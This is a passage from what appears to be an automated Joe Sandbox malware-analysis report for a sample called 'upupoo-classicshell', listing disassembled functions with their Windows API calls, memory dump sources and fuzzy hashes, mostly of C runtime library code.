                                                                                                                • Part of subcall function 00C284F0: __getptd.LIBCMT ref: 00C2850D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 1602911419-0
                                                                                                              • Opcode ID: 09d2bb303a7e49745c86157a3387973164374807afa54a6b04c348c8d7ec984e
                                                                                                              • Instruction ID: d3bd7d1d4df220e3139981a1b3dec97185d93648a532b359e4da2d1646632a49
                                                                                                              • Opcode Fuzzy Hash: 09d2bb303a7e49745c86157a3387973164374807afa54a6b04c348c8d7ec984e
                                                                                                              • Instruction Fuzzy Hash: 1711D7B1C04219DFDF00EFA5E446BAE7BB1FF04314F148169F814A7692DB789A15AF90
                                                                                                              Function 00C21A80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetClassInfoExW.USER32(00000000,?,?), ref: 00C21B5C
                                                                                                              • GetClassInfoExW.USER32(?,?,?), ref: 00C21B6F
                                                                                                              • LoadCursorW.USER32(?,?), ref: 00C21BB1
                                                                                                                • Part of subcall function 00C213B0: EnterCriticalSection.KERNEL32 ref: 00C213B6
                                                                                                                • Part of subcall function 00C21470: LeaveCriticalSection.KERNEL32 ref: 00C2147C
                                                                                                              • GetClassInfoExW.USER32(?,00000000,?), ref: 00C21BF9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClassInfo$CriticalSection$CursorEnterLeaveLoad
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 158815643-4108050209
                                                                                                              • Opcode ID: a9fb0991870440e5418c9a64b9291a9fbeae0e497afd6004d1c3ae10e25d7466
                                                                                                              • Instruction ID: 9be52296e50076bc2e1c3b71990111818437a8908971ec669ef2f813c945ce18
                                                                                                              • Opcode Fuzzy Hash: a9fb0991870440e5418c9a64b9291a9fbeae0e497afd6004d1c3ae10e25d7466
                                                                                                              • Instruction Fuzzy Hash: 175166B56043599FDB24CF14E840BAAB7E4FB98754F044A1DFD5883680EB35EA44CB92
                                                                                                              Function 6E09F750 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 123libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(63E47454), ref: 6E09F927
                                                                                                              • GetProcAddress.KERNEL32(00000000,-0B2380EC), ref: 6E09F92F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: _$4$_$4$_$4
                                                                                                              • API String ID: 1646373207-3055943180
                                                                                                              • Opcode ID: 767621f7ad4767ffde64dd3872ee5ff43a756ac7caf6da44eeb002cc07c5076d
                                                                                                              • Instruction ID: f723c243c971c25db23fd4090d388b64872a419fb549a502f081faf4d94af675
                                                                                                              • Opcode Fuzzy Hash: 767621f7ad4767ffde64dd3872ee5ff43a756ac7caf6da44eeb002cc07c5076d
                                                                                                              • Instruction Fuzzy Hash: DC41AB7161C5004FCF54DDBD888832DBBE9A74A3547B4842AF580C7302E678DC85BB51
                                                                                                              Function 6E0A1080 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Q>,$Q>,$Q>,
                                                                                                              • API String ID: 0-1249747301
                                                                                                              • Opcode ID: d46a08d303a72b2e8f42dbfdfc241f8a4d48ccc3e80a1aa99969c853be1e2f18
                                                                                                              • Instruction ID: 4196b8055687042f8eafff93eec4166d26cec92bcf168e162fbe893354b7c44d
                                                                                                              • Opcode Fuzzy Hash: d46a08d303a72b2e8f42dbfdfc241f8a4d48ccc3e80a1aa99969c853be1e2f18
                                                                                                              • Instruction Fuzzy Hash: 0E415AB170C9488FCF1489FE48847597BF2EB4A3107D48929D7A4C7347D274DC498BA2
                                                                                                              Function 10005CC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 10005CEB
                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 10005D65
                                                                                                                • Part of subcall function 1000D6F0: __FindPESection.LIBCMT ref: 1000D749
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 10005DD9
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 10005E04
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CookiesLocalValidate$CurrentFindImageNonwritableSection
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 1685366865-1018135373
                                                                                                              • Opcode ID: 9553568ea9ceda8bca7d9fe165bfdc0c2d6db0410be3a296f176b3528819398f
                                                                                                              • Instruction ID: 7dc808ba71b93887189a654e5a1d14b145ba9dad9eea2133575003d35e1b2c22
                                                                                                              • Opcode Fuzzy Hash: 9553568ea9ceda8bca7d9fe165bfdc0c2d6db0410be3a296f176b3528819398f
                                                                                                              • Instruction Fuzzy Hash: 2C41D434D002099FEF10DF58CC88AAFBBB5EF442A5F208157E8145B35ADB32EA05CB91
                                                                                                              Function 6E0AB360 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 6E0AB38B
                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6E0AB405
                                                                                                                • Part of subcall function 6E0B9270: __FindPESection.LIBCMT ref: 6E0B92C9
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 6E0AB479
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 6E0AB4A4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CookiesLocalValidate$CurrentFindImageNonwritableSection
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 1685366865-1018135373
                                                                                                              • Opcode ID: 8f91d8ada840b789df74fdffe71a0f6e3ba625329238890e4e62180e49f71edf
                                                                                                              • Instruction ID: c3884dfed04523ade2f4919d99dbb66d2bf250e5666e1150f1bac312e90fd24e
                                                                                                              • Opcode Fuzzy Hash: 8f91d8ada840b789df74fdffe71a0f6e3ba625329238890e4e62180e49f71edf
                                                                                                              • Instruction Fuzzy Hash: 2741813090020DABCB00CFDDC890BDEBBF9EF45318F148559EA18AB25AD7329A15CF91
                                                                                                              Function 6E0B9B59 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6E0B9B60
                                                                                                              • new.LIBCMT ref: 6E0B9BCC
                                                                                                              • __ExceptionPtr::__ExceptionPtr.LIBCMT ref: 6E0B9BE4
                                                                                                              • __ExceptionPtr::__ExceptionPtr.LIBCMT ref: 6E0B9C17
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Exception$Ptr::__$H_prolog3_catch
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 2421427270-1018135373
                                                                                                              • Opcode ID: a5c301ce95bb78266a1d94ef48d9366040fe172f3a0e6f6d9b99f463010d8183
                                                                                                              • Instruction ID: 0be8f4f161532b4ece854538804c04ab428959d8ce6939b110a7ce92203a61e5
                                                                                                              • Opcode Fuzzy Hash: a5c301ce95bb78266a1d94ef48d9366040fe172f3a0e6f6d9b99f463010d8183
                                                                                                              • Instruction Fuzzy Hash: FE311A70D052599FDB05CFE8C6A0BDDBBF8BF29304F544459E815BB281DB768A05CBA0
                                                                                                              Function 1000751C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,100074CD,?,?,1000746D,?,100148D8,0000000C,100075A0,00000000,00000000), ref: 1000753C
                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1000754F
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,100074CD,?,?,1000746D,?,100148D8,0000000C,100075A0,00000000,00000000,00000001,10003DC6), ref: 10007572
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                              • Opcode ID: f9d03282619bcdbcf4f796ca44d1777906c68be5a4441127bae86c73c4e60a76
                                                                                                              • Instruction ID: a6cc373632386b046271831ad89df3b5ae4c2ed718ad2c343cc66be689ef572f
                                                                                                              • Opcode Fuzzy Hash: f9d03282619bcdbcf4f796ca44d1777906c68be5a4441127bae86c73c4e60a76
                                                                                                              • Instruction Fuzzy Hash: 3EF04F35900218BBEB01DBA0CC49BEE7FB8EF043D2F40406CF905A2665CB749A40DA91
                                                                                                              Function 6E0B02FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6E0B02AD,?,?,6E0B024D,?,6E0C3D90,0000000C,6E0B0380,00000000,00000000), ref: 6E0B031C
                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E0B032F
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,6E0B02AD,?,?,6E0B024D,?,6E0C3D90,0000000C,6E0B0380,00000000,00000000,00000001,6E0A884C), ref: 6E0B0352
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                              • Opcode ID: c743eb1daad5e2bfad11c823ed0ee9adb83f451354e86e10c3305e09120f3024
                                                                                                              • Instruction ID: 36e6fd94ca4777cde6efcdf9c9f139f961930d8e7a4d1a83d52b1f6b2489eeda
                                                                                                              • Opcode Fuzzy Hash: c743eb1daad5e2bfad11c823ed0ee9adb83f451354e86e10c3305e09120f3024
                                                                                                              • Instruction Fuzzy Hash: 36F03C31910509EBCB519BE0C85CBEEBBB8FF45B51F404065E909A6250DB769940CE90
                                                                                                              Function 00C28119 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 00C28133
                                                                                                                • Part of subcall function 00C27633: __getptd_noexit.LIBCMT ref: 00C27636
                                                                                                                • Part of subcall function 00C27633: __amsg_exit.LIBCMT ref: 00C27643
                                                                                                              • __getptd.LIBCMT ref: 00C28144
                                                                                                              • __getptd.LIBCMT ref: 00C28152
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                              • String ID: MOC$csm
                                                                                                              • API String ID: 803148776-1389381023
                                                                                                              • Opcode ID: 80bc5694e9b82ccb911c1e2def009eca148bb7412d7462a82685ef422902e9d1
                                                                                                              • Instruction ID: e1de8f04da175dbdba31d1d6c9c31d1080f4a8c29de75890b514975bdce74d80
                                                                                                              • Opcode Fuzzy Hash: 80bc5694e9b82ccb911c1e2def009eca148bb7412d7462a82685ef422902e9d1
                                                                                                              • Instruction Fuzzy Hash: D8E04F325051248FD710AB69E08AB2833A5FB94714F1905A2F40CC7BA3CB38DD55E982
                                                                                                              Function 100079FC Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free
                                                                                                              • String ID:
                                                                                                              • API String ID: 269201875-0
                                                                                                              • Opcode ID: 21f173c06110ca813b1d8a54799e0dc708626917daf07cb3fb25c619c4a9ea40
                                                                                                              • Instruction ID: ef9529c39e39e816a71c09c075ce6ac7450448646c7ad7eb61865e6f519ba466
                                                                                                              • Opcode Fuzzy Hash: 21f173c06110ca813b1d8a54799e0dc708626917daf07cb3fb25c619c4a9ea40
                                                                                                              • Instruction Fuzzy Hash: AE41B076F00600AFEB14CF78C881A5EB7E5FF89790B1641A9E519EB345DB35AE01CB81
                                                                                                              Function 6E0B07DC Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free
                                                                                                              • String ID:
                                                                                                              • API String ID: 269201875-0
                                                                                                              • Opcode ID: 4029f72a9cedb2e10ca2970135893f4b7af01a4ab0c6799626f855d027ed05b6
                                                                                                              • Instruction ID: e35493495043ad1a1ccfe49b872ca59baab5d91ace91ec579b7fe638c86971b1
                                                                                                              • Opcode Fuzzy Hash: 4029f72a9cedb2e10ca2970135893f4b7af01a4ab0c6799626f855d027ed05b6
                                                                                                              • Instruction Fuzzy Hash: 6341D232A04204DFDB14CFB8C980B9EB7F5FF89714B1145A9E655EB345EB72AA01CB80
                                                                                                              Function 1000917E Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 10009187
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 100091AA
                                                                                                                • Part of subcall function 10007DA2: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,1000A5BB,00000001,00000000,?,10009255,00000001,00000004,00000000,00000001,?,?,10007A89), ref: 10007DD4
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100091D0
                                                                                                              • _free.LIBCMT ref: 100091E3
                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100091F2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2278895681-0
                                                                                                              • Opcode ID: 16ffc57c662404d9b0081ecc531bac5b523678dd3ae3e573b2155707af292dbe
                                                                                                              • Instruction ID: 4c5b1dbe4fe441e3b5a8e38914c4a6167444b4a600d1b6b9f77a85a0ac6f7216
                                                                                                              • Opcode Fuzzy Hash: 16ffc57c662404d9b0081ecc531bac5b523678dd3ae3e573b2155707af292dbe
                                                                                                              • Instruction Fuzzy Hash: CB018F7A7052267BB32187A65C8CCBB2AADEFC6AE1311012EFD08C3249DA608D0191B0
                                                                                                              Function 6E0B3ABA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 6E0B3AC3
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E0B3AE6
                                                                                                                • Part of subcall function 6E0B0F23: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6E0B6A46,00000001,00000000,?,6E0B3B91,00000001,00000004,00000000,00000001,?,?,6E0B0869), ref: 6E0B0F55
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6E0B3B0C
                                                                                                              • _free.LIBCMT ref: 6E0B3B1F
                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E0B3B2E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2278895681-0
                                                                                                              • Opcode ID: 53b6a27c1c3c39a3ad614239f5041a90c843f7c44c5ce64b42af013aa11de1eb
                                                                                                              • Instruction ID: fe2e85007e57b8fe680de6efacd322d2f255639608284a621b9953246852d41b
                                                                                                              • Opcode Fuzzy Hash: 53b6a27c1c3c39a3ad614239f5041a90c843f7c44c5ce64b42af013aa11de1eb
                                                                                                              • Instruction Fuzzy Hash: 3D01D872A11A157F271115EB5C9CEBF796DFECBAE13200519FA14D3108EAB6CC0185B0
                                                                                                              Function 00C21520 Relevance: 7.6, APIs: 5, Instructions: 58threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?), ref: 00C21538
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00C21545
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?), ref: 00C2155F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
